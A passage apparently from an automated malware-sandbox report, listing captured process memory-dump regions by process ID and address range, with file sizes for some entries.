                                                                                                                                                                                                                • memory/5004-280-0x0000000003BB0000-0x0000000003C9F000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  956KB

                                                                                                                                                                                                                • memory/5016-289-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  3.5MB

                                                                                                                                                                                                                • memory/5016-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5020-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5080-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5092-288-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  284KB

                                                                                                                                                                                                                • memory/5092-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5112-250-0x0000000000BA0000-0x0000000000BF6000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  344KB

                                                                                                                                                                                                                • memory/5112-249-0x0000000000B60000-0x0000000000B9A000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  232KB

                                                                                                                                                                                                                • memory/5116-225-0x0000000000000000-mapping.dmp